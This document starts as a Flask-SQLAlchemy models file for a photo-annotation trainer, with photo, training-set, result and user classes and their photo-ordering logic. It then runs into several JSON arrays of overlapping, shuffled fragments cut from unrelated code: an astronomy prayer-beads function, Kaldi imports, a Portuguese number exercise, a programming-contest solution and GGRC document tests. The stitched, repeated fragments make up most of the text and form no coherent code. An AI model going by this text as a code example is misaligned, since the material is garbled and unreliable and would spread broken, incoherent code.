    db.Column('photo_id', db.Integer, db.ForeignKey('photo.id'))
)


class Photo(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(64))
    picture = db.Column(db.String(128))
    md5 = db.Column(db.String(64))

    PICTURES_FOLDER = 'pictures/'

    @classmethod
    def create_from_file(cls, file, check_if_exists=True):
        # We check no photo with the same md5 already exists in db
        md5 = get_md5(file)
        if check_if_exists:
            photo = cls.query.filter_by(md5=md5).first()
            if photo is not None:
                return photo

        _, filename = os.path.split(file)
        path = os.path.join('vktrainer', cls.PICTURES_FOLDER, md5)
        copyfile(file, path)
        name, _ = os.path.splitext(filename)
        photo = Photo(name=name, md5=md5, picture=path)
        db.session.add(photo)
        db.session.commit()
        return photo

    def get_path(self):
        return os.path.join(self.PICTURES_FOLDER, self.md5)

    def get_absolute_url(self):
        return url_for('vktrainer.show_photo', pk=self.id)


class TrainingSet(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(64))
    photos = db.dynamic_loader(
        'Photo', secondary=photos, backref=db.backref('training_sets', lazy='dynamic'))

    def __str__(self):
        return self.name

    def get_absolute_url(self):
        return url_for('vktrainer.training_set', pk=self.id)

    def get_results_url(self):
        return url_for('vktrainer.training_set_results', pk=self.id)

    def get_leaderboard_url(self):
        return url_for('vktrainer.training_set_leaderboard', pk=self.id)

    def get_results(self):
        return [tr.get_pretty_result() for tr in self.training_results.all()]

    def get_leaderboard(self):
        count = func.count(TrainingResult.id)
        return self.training_results.join(
            TrainingResult.user,
        ).add_column(
            count,
        ).group_by(
            TrainingResult.user_id,
        ).order_by(
            desc(count),
        ).values(
            User.name,
            count,
        )

    def get_percentage_done(self):
        nb_photos_with_results = self.photos.filter(
            Photo.id.in_(self.training_results.with_entities(TrainingResult.photo_id))
        ).count()
        nb_photos = self.photos.count()
        return float(nb_photos_with_results) / nb_photos * 100

    def get_first_photo(self):
        if app.config['SHOW_PICTURES_ORDERING'] == 'linear':
            return self.photos.order_by('id').first()
        return self._get_next_photo_semi_random(None)

    def get_next_photo(self, photo):
        if app.config['SHOW_PICTURES_ORDERING'] == 'linear':
            return self._get_next_photo_linear(photo)
        else:
            return self._get_next_photo_semi_random(photo)

    def _get_next_photo_linear(self, photo):
        next_photo = self.photos.filter(Photo.id > photo.id).order_by('id').first()
        if not next_photo:
            # We are already at the last photo, we show the first one
            next_photo = self.photos.order_by('id').first()
        return next_photo

    def _get_previous_photo_linear(self, photo):
        previous_photo = self.photos.filter(Photo.id < photo.id).order_by('-id').first()
        if not previous_photo:
            # We are already at the first photo, we show the last one
            previous_photo = self.photos.order_by('-id').first()
        return previous_photo

    def _get_next_photo_semi_random(self, photo):
        """We serve a random photo without any results.

        If there aren't any, we serve a random photo.
        """
        photos_without_results = self.photos.filter(~Photo.id.in_(
            self.training_results.with_entities(TrainingResult.photo_id)
        ))
        if photo:
            photos_without_results = photos_without_results.filter(Photo.id != photo.id)
        nb_photos_without_results = photos_without_results.count()
        if nb_photos_without_results:
            return photos_without_results.all()[random.randint(0, nb_photos_without_results - 1)]
        else:
            nb_photos = self.photos.count()
            random_nb = random.randint(0, nb_photos - 1)
            return self.photos.all()[random_nb]

    def _get_previous_photo_semi_random(self, photo):
        # Don't want to allow previous photo in semi random mode (breaks UX)
        return None


class TrainingPattern(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    training_set_id = db.Column(db.Integer, db.ForeignKey('training_set.id'))
    name = db.Column(db.String(64))
    instruction = db.Column(db.Text)
    training_set = db.relation('TrainingSet', backref=db.backref('patterns', lazy='dynamic'))
    pattern_ref = db.Column(db.String(64))
    position = db.Column(db.Integer)

    @property
    def pattern(self):
        from .patterns import REF_TO_PATTERN_CLASS
        try:
            return REF_TO_PATTERN_CLASS[self.pattern_ref]
        except KeyError:
            raise KeyError('Unknown pattern: {}'.format(self.pattern_ref))


class TrainingResult(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    training_set_id = db.Column(db.Integer, db.ForeignKey('training_set.id'))
    photo_id = db.Column(db.Integer, db.ForeignKey('photo.id'))
    user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
    training_set = db.relation('TrainingSet', backref=db.backref('training_results', lazy='dynamic'))
    photo = db.relation('Photo')
    user = db.relation('User', lazy='joined', backref=db.backref('training_results'))
    result = db.Column(db.Text)  # Result stored in JSON
    photo_is_incorrect = db.Column(db.Boolean, default=False)

    def get_absolute_url(self):
        return url_for(
            'vktrainer.training_set_result',
            training_set_pk=self.training_set.id,
            result_pk=self.id,
        )

    @classmethod
    def create(cls, photo, training_set, user, result, **kwargs):
        training_result = cls(
            photo=photo,
            training_set=training_set,
            user=user,
            result=result,
            **kwargs
        )
        db.session.add(training_result)
        db.session.commit()
        return training_result

    def get_pretty_result(self):
        if self.photo_is_incorrect:
            result = 'Photo marked as incorrect'
        else:
            try:
                loaded_result = json.loads(self.result)
            except ValueError:
                # Could not decode JSON
                loaded_result = None
            if loaded_result:
                result = {
                    'state': 'OK',
                    'value': loaded_result,
                }
            else:
                result = {
                    'state': 'KO',
                    'value': {},
                }
        return {
            'photo': {
                'name': self.photo.name,
                'id': self.photo.id,
            },
            'result': result,
        }


class User(db.Model, UserMixin):
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(64))

    def __repr__(self):
        return self.name

    @classmethod
    def get_or_create(cls, name):
        user = cls.query.filter(cls.name == name).first()
        if not user:
            user = cls(name=name)
            db.session.add(user)
            db.session.commit()
            return user, True
        return user, False
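Read outside of SQLAlchemy, the semi-random policy above is simple: prefer photos nobody has annotated yet, never repeat the current photo, and fall back to any photo once everything has results. A minimal standalone sketch of that policy (hypothetical helper name, plain lists instead of queries):

import random

def next_photo_semi_random(photo_ids, ids_with_results, current=None):
    # Prefer photos that have no results yet, excluding the current photo.
    candidates = [p for p in photo_ids
                  if p not in ids_with_results and p != current]
    if candidates:
        return random.choice(candidates)
    # Every photo already has results: fall back to any random photo.
    return random.choice(photo_ids)

print(next_photo_semi_random([1, 2, 3, 4], {1, 2}, current=3))  # 4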
[ "Believing in a prayer bead is a mere act of faith, please don't", "<NAME> and contributors. # mc3 is open-source software under the MIT license (see", "prayer-bead method to estimate parameter uncertainties. Parameters ---------- data: 1D float ndarray A", "Number of prayer-bead shifts. If nprays=0, set to the number of data points.", "Copyright (c) 2015-2021 <NAME> and contributors. # mc3 is open-source software under the", "parameter uncertainties. Parameters ---------- data: 1D float ndarray A time-series dataset. nprays: Integer", "mere act of faith, please don't do that, we are scientists for god's", "prayer beads is a mere act of faith, please don't use it\" \"\\nfor", "is a mere act of faith, please don't do that, we are scientists", "A time-series dataset. nprays: Integer Number of prayer-bead shifts. If nprays=0, set to", "of faith, please don't do that, we are scientists for god's sake! \"\"\"", "scientists for god's sake! \"\"\" print( \"Believing in prayer beads is a mere", "mc3 is open-source software under the MIT license (see LICENSE). __all__ = [", "a mere act of faith, please don't do that, we are scientists for", "prayer-bead shifts. If nprays=0, set to the number of data points. Notes -----", "Implement a prayer-bead method to estimate parameter uncertainties. Parameters ---------- data: 1D float", "the number of data points. Notes ----- Believing in a prayer bead is", "# Copyright (c) 2015-2021 <NAME> and contributors. # mc3 is open-source software under", "shifts. If nprays=0, set to the number of data points. Notes ----- Believing", "number of data points. Notes ----- Believing in a prayer bead is a", "[ \"prayer_beads\", ] def prayer_beads(data=None, nprays=0): \"\"\" Implement a prayer-bead method to estimate", "a prayer-bead method to estimate parameter uncertainties. Parameters ---------- data: 1D float ndarray", "act of faith, please don't use it\" \"\\nfor published articles (see Cubillos et", "(see LICENSE). __all__ = [ \"prayer_beads\", ] def prayer_beads(data=None, nprays=0): \"\"\" Implement a", "sake! \"\"\" print( \"Believing in prayer beads is a mere act of faith,", "print( \"Believing in prayer beads is a mere act of faith, please don't", "If nprays=0, set to the number of data points. Notes ----- Believing in", "data points. Notes ----- Believing in a prayer bead is a mere act", "] def prayer_beads(data=None, nprays=0): \"\"\" Implement a prayer-bead method to estimate parameter uncertainties.", "don't use it\" \"\\nfor published articles (see Cubillos et al. 2017, AJ, 153).\")", "in prayer beads is a mere act of faith, please don't use it\"", "we are scientists for god's sake! \"\"\" print( \"Believing in prayer beads is", "that, we are scientists for god's sake! \"\"\" print( \"Believing in prayer beads", "use it\" \"\\nfor published articles (see Cubillos et al. 2017, AJ, 153).\") return", "of faith, please don't use it\" \"\\nfor published articles (see Cubillos et al.", "\"Believing in prayer beads is a mere act of faith, please don't use", "contributors. # mc3 is open-source software under the MIT license (see LICENSE). __all__", "---------- data: 1D float ndarray A time-series dataset. nprays: Integer Number of prayer-bead", "dataset. nprays: Integer Number of prayer-bead shifts. If nprays=0, set to the number", "Integer Number of prayer-bead shifts. If nprays=0, set to the number of data", "and contributors. # mc3 is open-source software under the MIT license (see LICENSE).", "to estimate parameter uncertainties. 
Parameters ---------- data: 1D float ndarray A time-series dataset.", "LICENSE). __all__ = [ \"prayer_beads\", ] def prayer_beads(data=None, nprays=0): \"\"\" Implement a prayer-bead", "please don't use it\" \"\\nfor published articles (see Cubillos et al. 2017, AJ,", "prayer bead is a mere act of faith, please don't do that, we", "in a prayer bead is a mere act of faith, please don't do", "Parameters ---------- data: 1D float ndarray A time-series dataset. nprays: Integer Number of", "float ndarray A time-series dataset. nprays: Integer Number of prayer-bead shifts. If nprays=0,", "under the MIT license (see LICENSE). __all__ = [ \"prayer_beads\", ] def prayer_beads(data=None,", "points. Notes ----- Believing in a prayer bead is a mere act of", "\"\"\" Implement a prayer-bead method to estimate parameter uncertainties. Parameters ---------- data: 1D", "nprays=0): \"\"\" Implement a prayer-bead method to estimate parameter uncertainties. Parameters ---------- data:", "license (see LICENSE). __all__ = [ \"prayer_beads\", ] def prayer_beads(data=None, nprays=0): \"\"\" Implement", "<reponame>alulujasmine/mc3 # Copyright (c) 2015-2021 <NAME> and contributors. # mc3 is open-source software", "please don't do that, we are scientists for god's sake! \"\"\" print( \"Believing", "def prayer_beads(data=None, nprays=0): \"\"\" Implement a prayer-bead method to estimate parameter uncertainties. Parameters", "2015-2021 <NAME> and contributors. # mc3 is open-source software under the MIT license", "MIT license (see LICENSE). __all__ = [ \"prayer_beads\", ] def prayer_beads(data=None, nprays=0): \"\"\"", "\"prayer_beads\", ] def prayer_beads(data=None, nprays=0): \"\"\" Implement a prayer-bead method to estimate parameter", "of prayer-bead shifts. If nprays=0, set to the number of data points. Notes", "mere act of faith, please don't use it\" \"\\nfor published articles (see Cubillos", "open-source software under the MIT license (see LICENSE). __all__ = [ \"prayer_beads\", ]", "nprays=0, set to the number of data points. Notes ----- Believing in a", "(c) 2015-2021 <NAME> and contributors. # mc3 is open-source software under the MIT", "are scientists for god's sake! \"\"\" print( \"Believing in prayer beads is a", "it\" \"\\nfor published articles (see Cubillos et al. 2017, AJ, 153).\") return None", "\"\"\" print( \"Believing in prayer beads is a mere act of faith, please", "nprays: Integer Number of prayer-bead shifts. If nprays=0, set to the number of", "method to estimate parameter uncertainties. Parameters ---------- data: 1D float ndarray A time-series", "# mc3 is open-source software under the MIT license (see LICENSE). __all__ =", "__all__ = [ \"prayer_beads\", ] def prayer_beads(data=None, nprays=0): \"\"\" Implement a prayer-bead method", "1D float ndarray A time-series dataset. nprays: Integer Number of prayer-bead shifts. If", "data: 1D float ndarray A time-series dataset. nprays: Integer Number of prayer-bead shifts.", "a prayer bead is a mere act of faith, please don't do that,", "software under the MIT license (see LICENSE). __all__ = [ \"prayer_beads\", ] def", "act of faith, please don't do that, we are scientists for god's sake!", "uncertainties. Parameters ---------- data: 1D float ndarray A time-series dataset. nprays: Integer Number", "god's sake! \"\"\" print( \"Believing in prayer beads is a mere act of", "of data points. Notes ----- Believing in a prayer bead is a mere", "Notes ----- Believing in a prayer bead is a mere act of faith,", "for god's sake! 
\"\"\" print( \"Believing in prayer beads is a mere act", "prayer_beads(data=None, nprays=0): \"\"\" Implement a prayer-bead method to estimate parameter uncertainties. Parameters ----------", "faith, please don't do that, we are scientists for god's sake! \"\"\" print(", "don't do that, we are scientists for god's sake! \"\"\" print( \"Believing in", "a mere act of faith, please don't use it\" \"\\nfor published articles (see", "do that, we are scientists for god's sake! \"\"\" print( \"Believing in prayer", "= [ \"prayer_beads\", ] def prayer_beads(data=None, nprays=0): \"\"\" Implement a prayer-bead method to", "to the number of data points. Notes ----- Believing in a prayer bead", "is open-source software under the MIT license (see LICENSE). __all__ = [ \"prayer_beads\",", "time-series dataset. nprays: Integer Number of prayer-bead shifts. If nprays=0, set to the", "set to the number of data points. Notes ----- Believing in a prayer", "the MIT license (see LICENSE). __all__ = [ \"prayer_beads\", ] def prayer_beads(data=None, nprays=0):", "estimate parameter uncertainties. Parameters ---------- data: 1D float ndarray A time-series dataset. nprays:", "faith, please don't use it\" \"\\nfor published articles (see Cubillos et al. 2017,", "bead is a mere act of faith, please don't do that, we are", "----- Believing in a prayer bead is a mere act of faith, please", "is a mere act of faith, please don't use it\" \"\\nfor published articles", "beads is a mere act of faith, please don't use it\" \"\\nfor published", "ndarray A time-series dataset. nprays: Integer Number of prayer-bead shifts. If nprays=0, set" ]
[ "* from ._const_arpa_lm import * from ._kaldi_rnnlm import * __all__ = [name for", "ArpaParseOptions from ._arpa_lm_compiler import * from ._const_arpa_lm import * from ._kaldi_rnnlm import *", "import * __all__ = [name for name in dir() if name[0] != '_'", "import * from ._const_arpa_lm import * from ._kaldi_rnnlm import * __all__ = [name", "* __all__ = [name for name in dir() if name[0] != '_' and", "import * from ._kaldi_rnnlm import * __all__ = [name for name in dir()", "._kaldi_rnnlm import * __all__ = [name for name in dir() if name[0] !=", "._arpa_lm_compiler import * from ._const_arpa_lm import * from ._kaldi_rnnlm import * __all__ =", "._arpa_file_parser import ArpaParseOptions from ._arpa_lm_compiler import * from ._const_arpa_lm import * from ._kaldi_rnnlm", "._const_arpa_lm import * from ._kaldi_rnnlm import * __all__ = [name for name in", "from ._kaldi_rnnlm import * __all__ = [name for name in dir() if name[0]", "from ._arpa_file_parser import ArpaParseOptions from ._arpa_lm_compiler import * from ._const_arpa_lm import * from", "= [name for name in dir() if name[0] != '_' and not name.endswith('Base')]", "* from ._kaldi_rnnlm import * __all__ = [name for name in dir() if", "from ._const_arpa_lm import * from ._kaldi_rnnlm import * __all__ = [name for name", "from ._arpa_lm_compiler import * from ._const_arpa_lm import * from ._kaldi_rnnlm import * __all__", "import ArpaParseOptions from ._arpa_lm_compiler import * from ._const_arpa_lm import * from ._kaldi_rnnlm import", "__all__ = [name for name in dir() if name[0] != '_' and not" ]
[ "floor(n2): print('O primeiro número é maior que o segundo!') elif floor(n1) < floor(n2):", "elif floor(n1) < floor(n2): print('O segundo número é maior que o primeiro') else:", "que o segundo!') elif floor(n1) < floor(n2): print('O segundo número é maior que", "número inteiro:')) n2 = float(input('Digite outro número inteiro:')) if floor(n1) > floor(n2): print('O", "número é maior que o segundo!') elif floor(n1) < floor(n2): print('O segundo número", "= float(input('Digite outro número inteiro:')) if floor(n1) > floor(n2): print('O primeiro número é", "o segundo!') elif floor(n1) < floor(n2): print('O segundo número é maior que o", "floor(n1) < floor(n2): print('O segundo número é maior que o primeiro') else: print('Os", "float(input('Digite um número inteiro:')) n2 = float(input('Digite outro número inteiro:')) if floor(n1) >", "<filename>Python/CeV/Exercicios/ex38.py<gh_stars>0 from math import floor n1 = float(input('Digite um número inteiro:')) n2 =", "import floor n1 = float(input('Digite um número inteiro:')) n2 = float(input('Digite outro número", "print('O primeiro número é maior que o segundo!') elif floor(n1) < floor(n2): print('O", "floor(n1) > floor(n2): print('O primeiro número é maior que o segundo!') elif floor(n1)", "if floor(n1) > floor(n2): print('O primeiro número é maior que o segundo!') elif", "math import floor n1 = float(input('Digite um número inteiro:')) n2 = float(input('Digite outro", "from math import floor n1 = float(input('Digite um número inteiro:')) n2 = float(input('Digite", "inteiro:')) if floor(n1) > floor(n2): print('O primeiro número é maior que o segundo!')", "segundo!') elif floor(n1) < floor(n2): print('O segundo número é maior que o primeiro')", "segundo número é maior que o primeiro') else: print('Os dois números são iguais!')", "primeiro número é maior que o segundo!') elif floor(n1) < floor(n2): print('O segundo", "um número inteiro:')) n2 = float(input('Digite outro número inteiro:')) if floor(n1) > floor(n2):", "inteiro:')) n2 = float(input('Digite outro número inteiro:')) if floor(n1) > floor(n2): print('O primeiro", "número inteiro:')) if floor(n1) > floor(n2): print('O primeiro número é maior que o", "é maior que o segundo!') elif floor(n1) < floor(n2): print('O segundo número é", "n2 = float(input('Digite outro número inteiro:')) if floor(n1) > floor(n2): print('O primeiro número", "print('O segundo número é maior que o primeiro') else: print('Os dois números são", "n1 = float(input('Digite um número inteiro:')) n2 = float(input('Digite outro número inteiro:')) if", "outro número inteiro:')) if floor(n1) > floor(n2): print('O primeiro número é maior que", "< floor(n2): print('O segundo número é maior que o primeiro') else: print('Os dois", "float(input('Digite outro número inteiro:')) if floor(n1) > floor(n2): print('O primeiro número é maior", "floor(n2): print('O segundo número é maior que o primeiro') else: print('Os dois números", "floor n1 = float(input('Digite um número inteiro:')) n2 = float(input('Digite outro número inteiro:'))", "= float(input('Digite um número inteiro:')) n2 = float(input('Digite outro número inteiro:')) if floor(n1)", "> floor(n2): print('O primeiro número é maior que o segundo!') elif floor(n1) <", "maior que o segundo!') elif floor(n1) < floor(n2): print('O segundo número é maior" ]
[ "input() Ng,Nm = map(int,input().split()) g=list(map(int,input().split())) m=list(map(int,input().split())) g.sort() m.sort() gg,mm=0,0 while (gg<Ng and mm<Nm):", "i in range(int(input())): input() Ng,Nm = map(int,input().split()) g=list(map(int,input().split())) m=list(map(int,input().split())) g.sort() m.sort() gg,mm=0,0 while", "g.sort() m.sort() gg,mm=0,0 while (gg<Ng and mm<Nm): if (m[mm]<=g[gg]): mm+=1 else: gg+=1 if", "map(int,input().split()) g=list(map(int,input().split())) m=list(map(int,input().split())) g.sort() m.sort() gg,mm=0,0 while (gg<Ng and mm<Nm): if (m[mm]<=g[gg]): mm+=1", "m=list(map(int,input().split())) g.sort() m.sort() gg,mm=0,0 while (gg<Ng and mm<Nm): if (m[mm]<=g[gg]): mm+=1 else: gg+=1", "in range(int(input())): input() Ng,Nm = map(int,input().split()) g=list(map(int,input().split())) m=list(map(int,input().split())) g.sort() m.sort() gg,mm=0,0 while (gg<Ng", "if (m[mm]<=g[gg]): mm+=1 else: gg+=1 if (gg==Ng): print(\"MechaGodzilla\") elif (mm==Nm): print(\"Godzilla\") else: print(\"uncertain\")", "g=list(map(int,input().split())) m=list(map(int,input().split())) g.sort() m.sort() gg,mm=0,0 while (gg<Ng and mm<Nm): if (m[mm]<=g[gg]): mm+=1 else:", "gg,mm=0,0 while (gg<Ng and mm<Nm): if (m[mm]<=g[gg]): mm+=1 else: gg+=1 if (gg==Ng): print(\"MechaGodzilla\")", "while (gg<Ng and mm<Nm): if (m[mm]<=g[gg]): mm+=1 else: gg+=1 if (gg==Ng): print(\"MechaGodzilla\") elif", "and mm<Nm): if (m[mm]<=g[gg]): mm+=1 else: gg+=1 if (gg==Ng): print(\"MechaGodzilla\") elif (mm==Nm): print(\"Godzilla\")", "mm<Nm): if (m[mm]<=g[gg]): mm+=1 else: gg+=1 if (gg==Ng): print(\"MechaGodzilla\") elif (mm==Nm): print(\"Godzilla\") else:", "for i in range(int(input())): input() Ng,Nm = map(int,input().split()) g=list(map(int,input().split())) m=list(map(int,input().split())) g.sort() m.sort() gg,mm=0,0", "m.sort() gg,mm=0,0 while (gg<Ng and mm<Nm): if (m[mm]<=g[gg]): mm+=1 else: gg+=1 if (gg==Ng):", "Ng,Nm = map(int,input().split()) g=list(map(int,input().split())) m=list(map(int,input().split())) g.sort() m.sort() gg,mm=0,0 while (gg<Ng and mm<Nm): if", "= map(int,input().split()) g=list(map(int,input().split())) m=list(map(int,input().split())) g.sort() m.sort() gg,mm=0,0 while (gg<Ng and mm<Nm): if (m[mm]<=g[gg]):", "range(int(input())): input() Ng,Nm = map(int,input().split()) g=list(map(int,input().split())) m=list(map(int,input().split())) g.sort() m.sort() gg,mm=0,0 while (gg<Ng and", "(gg<Ng and mm<Nm): if (m[mm]<=g[gg]): mm+=1 else: gg+=1 if (gg==Ng): print(\"MechaGodzilla\") elif (mm==Nm):" ]
[ "= doc_type or all_models.Document.URL resp, doc = self.gen.generate_object( all_models.Document, data ) self.assertTrue( all_models.Document.query.filter(", "with sent type.\"\"\" data = { \"title\": \"test_title\", \"link\": \"test_link\", } if doc_type", "resp, doc = self.gen.generate_object( all_models.Document, data ) self.assertTrue( all_models.Document.query.filter( all_models.Document.id == resp.json[\"document\"]['id'], all_models.Document.document_type", "= all_models.Document._inflector.table_singular obj = all_models.Document() obj_dict = self.gen.obj_to_dict(obj, obj_name) obj_dict[obj_name].update(data) resp = self.api.post(all_models.Document,", "# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file> \"\"\"Integration tests for Document\"\"\" from ggrc.models", "# pylint: disable=invalid-name def setUp(self): super(TestDocument, self).setUp() self.api = Api() self.gen = generator.ObjectGenerator()", "{ \"title\": \"test_title\", \"link\": \"test_link\", } if doc_type is not None: data[\"document_type\"] =", "<see LICENSE file> \"\"\"Integration tests for Document\"\"\" from ggrc.models import all_models from integration.ggrc", "obj_dict) self.assert400(resp) self.assertEqual('\"Invalid value for attribute document_type. ' 'Expected options are `URL`, `EVIDENCE`,", "def test_create_url_default(self): \"\"\"Test create url(default).\"\"\" self.create_document_by_type(None) def test_create_evidence(self): \"\"\"Test create evidence.\"\"\" self.create_document_by_type(all_models.Document.ATTACHMENT) def", "doc_type or all_models.Document.URL resp, doc = self.gen.generate_object( all_models.Document, data ) self.assertTrue( all_models.Document.query.filter( all_models.Document.id", "\"\"\"Test create url.\"\"\" self.create_document_by_type(all_models.Document.URL) def test_create_url_default(self): \"\"\"Test create url(default).\"\"\" self.create_document_by_type(None) def test_create_evidence(self): \"\"\"Test", "{\"title\": update_title}) self.assert200(response) self.assertEqual(all_models.Document.query.get(document.id).title, update_title) def create_document_by_type(self, doc_type): \"\"\"Create docuemtn with sent type.\"\"\"", "self.gen.generate_object( all_models.Document, data ) self.assertTrue( all_models.Document.query.filter( all_models.Document.id == resp.json[\"document\"]['id'], all_models.Document.document_type == doc_type, ).all()", "if doc_type is not None: data[\"document_type\"] = doc_type doc_type = doc_type or all_models.Document.URL", "title.\"\"\" create_title = \"test_title\" update_title = \"update_test_title\" document = factories.DocumentFactory(title=create_title) response = self.api.put(document,", "all_models.Document.document_type == doc_type, ).all() ) return (resp, doc) def test_create_url(self): \"\"\"Test create url.\"\"\"", "(resp, doc) def test_create_url(self): \"\"\"Test create url.\"\"\" self.create_document_by_type(all_models.Document.URL) def test_create_url_default(self): \"\"\"Test create url(default).\"\"\"", "self.gen.obj_to_dict(obj, obj_name) obj_dict[obj_name].update(data) resp = self.api.post(all_models.Document, obj_dict) self.assert400(resp) self.assertEqual('\"Invalid value for attribute document_type.", "data[\"document_type\"] = doc_type doc_type = doc_type or all_models.Document.URL resp, doc = self.gen.generate_object( all_models.Document,", "3, \"title\": \"test_title\", \"link\": \"test_link\", \"owners\": [self.gen.create_stub(all_models.Person.query.first())], } obj_name = 
all_models.Document._inflector.table_singular obj =", "self.api.post(all_models.Document, obj_dict) self.assert400(resp) self.assertEqual('\"Invalid value for attribute document_type. ' 'Expected options are `URL`,", "= all_models.Document() obj_dict = self.gen.obj_to_dict(obj, obj_name) obj_dict[obj_name].update(data) resp = self.api.post(all_models.Document, obj_dict) self.assert400(resp) self.assertEqual('\"Invalid", "= { \"title\": \"test_title\", \"link\": \"test_link\", } if doc_type is not None: data[\"document_type\"]", "TestCase from integration.ggrc.api_helper import Api from integration.ggrc import generator from integration.ggrc.models import factories", "self.create_document_by_type(all_models.Document.URL) def test_create_url_default(self): \"\"\"Test create url(default).\"\"\" self.create_document_by_type(None) def test_create_evidence(self): \"\"\"Test create evidence.\"\"\" self.create_document_by_type(all_models.Document.ATTACHMENT)", "class TestDocument(TestCase): \"\"\"Document test cases\"\"\" # pylint: disable=invalid-name def setUp(self): super(TestDocument, self).setUp() self.api", "\"\"\"Test create url(default).\"\"\" self.create_document_by_type(None) def test_create_evidence(self): \"\"\"Test create evidence.\"\"\" self.create_document_by_type(all_models.Document.ATTACHMENT) def test_create_invalid_type(self): \"\"\"Test", "import Api from integration.ggrc import generator from integration.ggrc.models import factories class TestDocument(TestCase): \"\"\"Document", "update_title = \"update_test_title\" document = factories.DocumentFactory(title=create_title) response = self.api.put(document, {\"title\": update_title}) self.assert200(response) self.assertEqual(all_models.Document.query.get(document.id).title,", "\"\"\"Document test cases\"\"\" # pylint: disable=invalid-name def setUp(self): super(TestDocument, self).setUp() self.api = Api()", "test_create_url_default(self): \"\"\"Test create url(default).\"\"\" self.create_document_by_type(None) def test_create_evidence(self): \"\"\"Test create evidence.\"\"\" self.create_document_by_type(all_models.Document.ATTACHMENT) def test_create_invalid_type(self):", "\"document_type\": 3, \"title\": \"test_title\", \"link\": \"test_link\", \"owners\": [self.gen.create_stub(all_models.Person.query.first())], } obj_name = all_models.Document._inflector.table_singular obj", "doc_type is not None: data[\"document_type\"] = doc_type doc_type = doc_type or all_models.Document.URL resp,", "test_create_evidence(self): \"\"\"Test create evidence.\"\"\" self.create_document_by_type(all_models.Document.ATTACHMENT) def test_create_invalid_type(self): \"\"\"Test validation document_type.\"\"\" data = {", "all_models.Document.id == resp.json[\"document\"]['id'], all_models.Document.document_type == doc_type, ).all() ) return (resp, doc) def test_create_url(self):", "integration.ggrc import TestCase from integration.ggrc.api_helper import Api from integration.ggrc import generator from integration.ggrc.models", "all_models.Document.query.filter( all_models.Document.id == resp.json[\"document\"]['id'], all_models.Document.document_type == doc_type, ).all() ) return (resp, doc) def", "or all_models.Document.URL resp, doc = self.gen.generate_object( all_models.Document, data ) self.assertTrue( all_models.Document.query.filter( all_models.Document.id ==", "test_create_url(self): \"\"\"Test create url.\"\"\" self.create_document_by_type(all_models.Document.URL) def test_create_url_default(self): \"\"\"Test create url(default).\"\"\" 
self.create_document_by_type(None) def test_create_evidence(self):", "Google Inc. # Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file> \"\"\"Integration tests for Document\"\"\"", "from ggrc.models import all_models from integration.ggrc import TestCase from integration.ggrc.api_helper import Api from", "data = { \"title\": \"test_title\", \"link\": \"test_link\", } if doc_type is not None:", "\"title\": \"test_title\", \"link\": \"test_link\", } if doc_type is not None: data[\"document_type\"] = doc_type", "= generator.ObjectGenerator() def test_update_title(self): \"\"\"Test update document title.\"\"\" create_title = \"test_title\" update_title =", "self.assert200(response) self.assertEqual(all_models.Document.query.get(document.id).title, update_title) def create_document_by_type(self, doc_type): \"\"\"Create docuemtn with sent type.\"\"\" data =", "== doc_type, ).all() ) return (resp, doc) def test_create_url(self): \"\"\"Test create url.\"\"\" self.create_document_by_type(all_models.Document.URL)", "doc_type doc_type = doc_type or all_models.Document.URL resp, doc = self.gen.generate_object( all_models.Document, data )", ") return (resp, doc) def test_create_url(self): \"\"\"Test create url.\"\"\" self.create_document_by_type(all_models.Document.URL) def test_create_url_default(self): \"\"\"Test", "def test_create_url(self): \"\"\"Test create url.\"\"\" self.create_document_by_type(all_models.Document.URL) def test_create_url_default(self): \"\"\"Test create url(default).\"\"\" self.create_document_by_type(None) def", "2017 Google Inc. # Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file> \"\"\"Integration tests for", "ggrc.models import all_models from integration.ggrc import TestCase from integration.ggrc.api_helper import Api from integration.ggrc", "\"test_title\" update_title = \"update_test_title\" document = factories.DocumentFactory(title=create_title) response = self.api.put(document, {\"title\": update_title}) self.assert200(response)", "\"\"\"Create docuemtn with sent type.\"\"\" data = { \"title\": \"test_title\", \"link\": \"test_link\", }", "\"test_link\", \"owners\": [self.gen.create_stub(all_models.Person.query.first())], } obj_name = all_models.Document._inflector.table_singular obj = all_models.Document() obj_dict = self.gen.obj_to_dict(obj,", "url.\"\"\" self.create_document_by_type(all_models.Document.URL) def test_create_url_default(self): \"\"\"Test create url(default).\"\"\" self.create_document_by_type(None) def test_create_evidence(self): \"\"\"Test create evidence.\"\"\"", "factories.DocumentFactory(title=create_title) response = self.api.put(document, {\"title\": update_title}) self.assert200(response) self.assertEqual(all_models.Document.query.get(document.id).title, update_title) def create_document_by_type(self, doc_type): \"\"\"Create", "evidence.\"\"\" self.create_document_by_type(all_models.Document.ATTACHMENT) def test_create_invalid_type(self): \"\"\"Test validation document_type.\"\"\" data = { \"document_type\": 3, \"title\":", "doc_type, ).all() ) return (resp, doc) def test_create_url(self): \"\"\"Test create url.\"\"\" self.create_document_by_type(all_models.Document.URL) def", "create evidence.\"\"\" self.create_document_by_type(all_models.Document.ATTACHMENT) def test_create_invalid_type(self): \"\"\"Test validation document_type.\"\"\" data = { \"document_type\": 3,", "doc_type = doc_type or all_models.Document.URL resp, doc = self.gen.generate_object( all_models.Document, data ) 
